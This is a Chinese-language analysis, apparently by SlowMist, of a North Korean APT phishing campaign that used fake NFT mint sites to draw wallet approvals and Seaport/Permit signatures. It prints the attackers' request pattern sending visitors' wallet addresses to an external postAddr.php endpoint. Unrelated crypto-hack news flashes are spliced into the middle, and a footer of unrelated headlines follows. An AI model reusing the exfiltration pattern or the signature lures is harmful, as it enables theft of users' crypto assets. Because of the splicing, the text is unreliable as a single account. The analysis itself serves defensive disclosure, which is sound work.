9 月 4 日,推特用戶 Phantom X 發推稱朝鮮 APT 組織針對數十個 ETH 和 SOL 項目進行大規模的網絡釣魚活動。
(https://twitter.com/PhantomXSec/status/1566219671057371136 )
該推特用戶給出了 196 個釣魚域名信息,分析后關聯到朝鮮黑客相關信息,具體的域名列表如下:
(https://pastebin.com/UV 9 pJN 2 M)
慢霧安全團隊注意到該事件并第一時間跟進深入分析:
(https://twitter.com/IM_ 23 pds/status/1566258373284093952 )
由于朝鮮黑客針對加密貨幣行業的攻擊模型多樣化,我們披露的也只是冰山一角,因為一些保密的要求,本篇文章也僅針對其中一部分釣魚素材包括相關釣魚錢包地址進行分析。這里將重點針對 NFT 釣魚進行分析。
慢霧:Apple Store惡意釣魚程序可模仿正常應用程序,盜取賬號密碼以繞過2FA:7月25日消息,慢霧首席信息安全官23pds發推提醒用戶注意Apple ID出現的最新攻擊案例,其中Apple Store出現惡意釣魚程序,通過模仿正常應用程序盜取用戶賬號和密碼,然后攻擊者把自己的號碼加入雙重認證的信任號碼,控制賬號權限,用來繞過蘋果的2FA。“加密貨幣用戶務必注意,因為目前有不少用戶、錢包的備份方案是iCloud備份,一旦被攻擊,可能造成資產損失”。[2023/7/25 15:56:56]
經過深入分析,發現此次釣魚的其中一種方式是發布虛假 NFT 相關的、帶有惡意 Mint 的誘餌網站,這些 NFT 在 OpenSea、X2Y2 和 Rarible 等平臺上都有出售。此次 APT 組織針對 Crypto 和 NFT 用戶的釣魚涉及將近 500 多個域名。
查詢這些域名的注冊相關信息,發現注冊日期最早可追溯到 7 個月前:
同時我們也發現朝鮮黑客常使用的一些獨有的釣魚特征:
特征一:釣魚網站都會記錄訪客數據并保存到外部站點。黑客通過 HTTP GET 請求將站點訪問者信息記錄到外部域,發送請求的域名雖不同但是請求的 API 接口都為 “/postAddr.php”。一般格式為 “https://nserva.live/postAddr.php? mmAddr=...[Metamask]...&accessTime=xxx&url=evil.site”,其中參數 mmAddr 記錄訪客的錢包地址,accessTime 記錄訪客的訪問時間,url 記錄訪客當前所訪問的釣魚網站鏈接。
慢霧:利用者通過執行惡意提案控制了Tornado.Cash的治理:金色財經報道,SlowMist發布Tornado.Cash治理漏洞解析。 5月20日,Tornado.Cash遭受了治理攻擊,利用者通過執行惡意提案控制了Tornado.Cash的治理。5月13日,利用者發起了20提案,并在提案中說明20提案是對16提案的補充,具有相同的執行邏輯。但實際上,提案合約多了一個自毀邏輯,其創建者是通過create2創建的,具有自毀功能,所以在與提案合約自毀后,利用者仍可以部署不同的以與以前相同的方式將字節碼發送到相同的地址。不幸的是,社區沒有看到擬議合約中的犯規行為,許多用戶投票支持該提案。
在5月18日,利用者通過創建具有多個交易的新地址,反復將0代幣鎖定在治理中。利用提案合約可以銷毀并重新部署新邏輯的特性,利用者在5月20日7:18(UTC)銷毀了提案執行合約,并在同一地址部署了一個惡意合約,其邏輯是修改用戶在治理中鎖定的代幣數量。
攻擊者修改完提案合約后,于5月20日7:25(UTC)執行惡意提案合約。該提案的執行是通過 Delegatecall 執行的,因此,該提案的執行導致治理合約中由開發者控制的地址的代幣鎖定量被修改為 10,000。提案執行完成后,攻擊者從治理庫中解鎖了TORN代幣。金庫中的TORN代幣儲備已經耗盡,同時利用者控制了治理。[2023/5/21 15:17:00]
慢霧:pGALA合約黑客已獲利430萬美元:11月4日消息,安全團隊慢霧在推特上表示,pGALA合約黑客已將大部分GALA兌換成13,000枚BNB,獲利超430萬美元,該地址仍有450億枚Gala,但不太可能兌現,因為資金池基本已耗盡。此外,黑客的初始資金來自幾個幣安賬戶。
今日早些時候消息,一個BNB Chain上地址在BNB Chain上地址憑空鑄造了超10億美元的pGALA代幣,并通過在PancakeSwap上售出獲利。pNetwork表示此為跨鏈橋配置錯誤所致,GALA跨鏈橋已暫停,請用戶不要在BNB Chain上DEX中交易pGALA。[2022/11/4 12:16:04]
特征二:釣魚網站會請求一個 NFT 項目價目表,通常 HTTP 的請求路徑為 “getPriceData.php”:
特征三:存在一個鏈接圖像到目標項目的文件 “imgSrc.js”,包含目標站點列表和在其相應網絡釣魚站點上使用的圖像文件的托管位置,這個文件可能是釣魚網站模板的一部分。
進一步分析發現 APT 用于監控用戶請求的主要域名為 “thedoodles.site”,此域名在 APT 活動早期主要用來記錄用戶數據:
慢霧:Transit Swap事件中轉移到Tornado Cash的資金超過600萬美元:金色財經報道,慢霧 MistTrack 對 Transit Swap 事件資金轉移進行跟進分析,以下將分析結論同步社區:
Hacker#1 攻擊黑客(盜取最大資金黑客),獲利金額:約 2410 萬美元
1: 0x75F2...FFD46
2: 0xfa71...90fb
已歸還超 1890 萬美元的被盜資金;12,500 BNB 存款到 Tornado Cash;約 1400 萬 MOONEY 代幣和 67,709 DAI 代幣轉入 ShibaSwap: BONE Token 合約地址。
Hacker#2 套利機器人-1,獲利金額:1,166,882.07 BUSD
0xcfb0...7ac7(BSC)
保留在獲利地址中,未進一步轉移。
Hacker#3 攻擊模仿者-1,獲利金額:356,690.71 USDT
0x87be...3c4c(BSC)
Hacker#4 套利機器人-2,獲利金額:246,757.31 USDT
0x0000...4922(BSC)
已全部追回。
Hacker#5 套利機器人-3,獲利金額:584,801.17 USDC
0xcc3d...ae7d(BSC)
USDC 全部轉移至新地址 0x8960...8525,后無進一步轉移。
Hacker#6 攻擊模仿者-2,獲利金額:2,348,967.9 USDT
0x6e60...c5ea(BSC)
Hacker#7 套利機器人-4,獲利金額:5,974.52 UNI、1,667.36 MANA
0x6C6B...364e(ETH)
通過 Uniswap 兌換為 30.17 ETH,其中 0.71 支付給 Flashbots,剩余 ETH 未進一步轉移。[2022/10/6 18:41:10]
慢霧:BTFinance被黑,策略池需防范相關風險:據慢霧區情報,智能DeFi收益聚合器BT.Finance遭受閃電貸攻擊。受影響的策略包括ETH、USDC和USDT。經慢霧安全團隊分析,本次攻擊手法與yearnfinance的DAI策略池被黑的手法基本一致。具體分析可參考慢霧關于yearnfinace被黑的技術分析。慢霧安全團隊提醒,近期對接CurveFinance做相關策略的機槍池頻繁遭受攻擊。相關已對接CurveFinance收益聚合器產品應注意排查使用的策略是否存在類似問題,必要時可以聯系慢霧安全團隊協助處理。[2021/2/9 19:19:41]
查詢該域名的 HTTPS 證書啟用時間是在 7 個月之前,黑客組織已經開始實施對 NFT 用戶對攻擊。
最后來看下黑客到底運行和部署了多少個釣魚站點:
比如最新的站點偽裝成世界杯主題:
繼續根據相關的 HTTPS 證書搜索得到相關的網站主機信息:
在一些主機地址中發現了黑客使用的各種攻擊腳本和統計受害者信息的 txt 文件。
這些文件記錄了受害者訪問記錄、授權情況、使用插件錢包的情況:
可以發現這些信息跟釣魚站點采集的訪客數據相吻合。
其中還包括受害者 approve 記錄:
以及簽名數據 sigData 等,由于比較敏感此處不進行展示。
另外,統計發現主機相同 IP 下 NFT 釣魚站群,單獨一個 IP 下就有 372 個 NFT 釣魚站點:
另一個 IP 下也有 320 個 NFT 釣魚站群:
甚至包括朝鮮黑客在經營的一個 DeFi 平臺:
由于篇幅有限,此處不再贅述。
結合之前文章,我們對此次釣魚事件的核心代碼進行了分析。我們發現黑客釣魚涉及到 WETH、USDC、DAI、UNI 等多個地址協議。
下面代碼用于誘導受害者進行授權 NFT、ERC 20 等較常見的釣魚 Approve 操作:
除此之外,黑客還會誘導受害者進行 Seaport、Permit 等簽名。
下面是這種簽名的正常樣例,只是在釣魚網站中不是 “opensea.io” 這個域名。
我們在黑客留下的主機也發現了這些留存的簽名數據和 “Seaport” 的簽名數據特征一致。
由于這類型的簽名請求數據可以“離線存儲”,黑客在拿到大量的受害者簽名數據后批量化的上鏈轉移資產。
對釣魚網站及手法分析后,我們選取其中一個釣魚地址(0xC0fd...e0ca)進行分析。
可以看到這個地址已被 MistTrack 標記為高風險釣魚地址,交易數也還挺多。釣魚者共收到 1055 個 NFT,售出后獲利近 300 ETH。
往上溯源,該地址的初始資金來源于地址(0 x 2 e 0 a...DA 82 )轉入的 4.97 ETH。往下溯源,則發現該地址有與其他被 MistTrack 標記為風險的地址有交互,以及有 5.7 ETH 轉入了 FixedFloat。
再來分析下初始資金來源地址(0 x 2 e 0 a...DA 82 ),目前收到約 6.5 ETH。初始資金來源于 Binance 轉入的 1.433 ETH。
同時,該地址也是與多個風險地址進行交互。
由于保密性和隱私性,本文僅針對其中一部分 NFT 釣魚素材進行分析,并提煉出朝鮮黑客的部分釣魚特征,當然,這只是冰山一角。慢霧在此建議,用戶需加強對安全知識的了解,進一步強化甄別網絡釣魚攻擊的能力等,避免遭遇此類攻擊。
Ps. 感謝 hip、ScamSniffer 提供的支持。
相關鏈接:
https://www.prevailion.com/what-wicked-webs-we-unweave
https://twitter.com/PhantomXSec/status/1566219671057371136
https://twitter.com/evilcos/status/1603969894965317632
慢霧科技
個人專欄
閱讀更多
金色財經 子木
金色早8點
去中心化金融社區
虎嗅科技
區塊律動BlockBeats
CertiK中文社區
深潮TechFlow
念青
Odaily星球日報
騰訊研究院
文:章魚哥 特朗普14日在其創建的社交平臺truth social上發帖稱,“美國需要一個超級英雄”。他還預告自己將于當地時間15日宣布“重大消息”.
1900/1/1 0:00:00原文作者:@thehiddenmaze,由 DeFi 之道編譯。忽略這篇文章可能會使您錯失 1,000,000 美元.
1900/1/1 0:00:00▌中國將同海合會國家深化數字貨幣合作12月9日消息,習近平出席首屆中國-海灣阿拉伯國家合作委員會峰會,并表示,中方愿同海合會國家開展金融監管合作,成立共同投資聯合會.
1900/1/1 0:00:00當地時間12月14日,美聯儲宣布加息 50 個基點,結束了自 6 月開始連續加息 75 個基點的激進步伐,符合市場預期.
1900/1/1 0:00:00原文標題:《 飛速發展,細數 2022 年比特幣的十大重要進展 》原文作者:Cory Klippsten, Tomer Strolight.
1900/1/1 0:00:00自NFT流行以來,一直有人將這些由區塊鏈驅動的代幣視作貫徹人類精神的最終療法。但是NFT真的都存儲在區塊鏈上了嗎?如果是這樣的話,怎么還會出現百萬NFT被盜的事件呢?如果你也想過這些問題,那么請.
1900/1/1 0:00:00